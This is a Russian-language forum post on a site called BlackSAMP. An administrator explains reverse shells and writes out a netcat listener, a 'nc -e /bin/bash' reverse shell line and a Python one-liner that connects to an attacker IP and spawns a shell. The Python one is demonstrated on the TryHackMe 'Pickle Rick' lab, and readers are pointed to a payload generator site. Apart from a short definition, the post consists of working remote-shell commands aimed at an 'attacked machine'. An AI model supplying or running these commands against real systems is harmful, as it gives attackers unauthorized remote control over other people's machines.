Добро пожаловать на BlackSAMP - ФОРУМ

  • Приватные и секретные разделы доступны только зарегистрированным пользователям.

    Вся важная информация в нашем ТГ: t.me/gtablack

    На данном форуме запрещено публиковать контент нарушающий Российское законодательство, за это последует блокировка ФА.

Обратная оболочка

DarkPhantom

Активный
Администратор
Регистрация
18 Авг 2024
Сообщения
90
Реакции
26
Баллы
28
Обратная оболочка (reverse shell) — это тип оболочки, при котором целевая машина подключается к машине атакующего, а не наоборот. Это позволяет обойти брандмауэры и другие сетевые ограничения, которые могут блокировать входящие соединения. Давайте разберем, как это работает.

На атакующей машине откройте терминал и запустите Netcat для прослушивания любого порта , у меня 4444:

Код:
nc -lvnp 4444

Здесь:
- -l указывает неткет прослушивать входящие соединения,
- -v включает режим отладки,
- -n предотвращает разрешение имен хостов,
- -p указывает порт.

Если у вас есть доступ к терминалу на атакуемой машине :
Код:
nc -e /bin/bash <your_ip> 4444

Здесь <your_ip> - это IP-адрес вашей атакующей машины, а 4444 - порт, который вы указали в неткете на атакующей машине.

Если доступ к терминалу ограничен или вы не можете использовать команды напрямую, вы можете использовать Python для создания обратной оболочки. Покажу на примере TryHackMe - машина Pickle Rick.
1000371689.jpg
Проверим на наличие Python
Код:
which python3
Если Python установлен, вы увидите путь к исполняемому файлу.
1000371690.jpg
Перейдите на сайт revshells.com, выберите Python, введите ваш IP-адрес и порт, и скопируйте сгенерированную команду.
Затем админ панели введите сгенерированную команду.
Python:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
Это создаст обратную оболочку, которая подключится к вашей атакующей машине на указанный порт.
 
Последнее редактирование:
Сверху Снизу